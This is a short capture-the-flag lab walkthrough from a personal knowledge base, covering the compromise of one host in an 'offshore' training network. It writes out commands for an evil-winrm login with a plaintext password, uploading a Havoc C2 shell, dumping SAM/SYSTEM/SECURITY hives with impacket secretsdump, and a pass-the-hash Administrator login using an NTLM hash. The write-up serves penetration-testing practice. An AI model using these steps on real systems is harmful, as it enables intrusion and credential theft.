Exploitation

Loggoing in to JOE-LPTP using evilwinrm

proxychains evil-winrm -i 172.16.1.201 -u 'joe' -p 'Dev0ftheyear!' /domain:lab.offshore.local

Uploading Havoc Shell

After uploading the havoc shell. I found out that there is thightvnc server running

Connecting to vnc server

 
proxychains xtightvncviewer 172.16.1.201

Found that I have access to imagebacks

Download SAM, System, Security files from Widows/system32/config

Cracking the SAM files using impacket secretsdump

proxychains ./secretsdump.py -system /home/jay/Documents/offshore/DC0/JOE-LPTP_172.16.1.201/loot/system -sam /home/jay/Documents/offshore/DC0/JOE-LPTP_172.16.1.201/loot/SAM -security  /home/jay/Documents/offshore/DC0/JOE-LPTP_172.16.1.201/loot/security LOCAL

LOOT

Logging in a administrator

Obtaining the flag form the Dektop Folder.

 
proxychains evil-winrm -i 172.16.1.201 -u 'Administrator' -H 49a332d455162a446ead15763e45817e  /domain:lab.offshore.local

Malleum Knowledge Base

Explorer

Exploitation

Loggoing in to JOE-LPTP using evilwinrm

Uploading Havoc Shell

Connecting to vnc server

Found that I have access to imagebacks

Cracking the SAM files using impacket secretsdump

Logging in a administrator

Obtaining the flag form the Dektop Folder.

Graph View

Table of Contents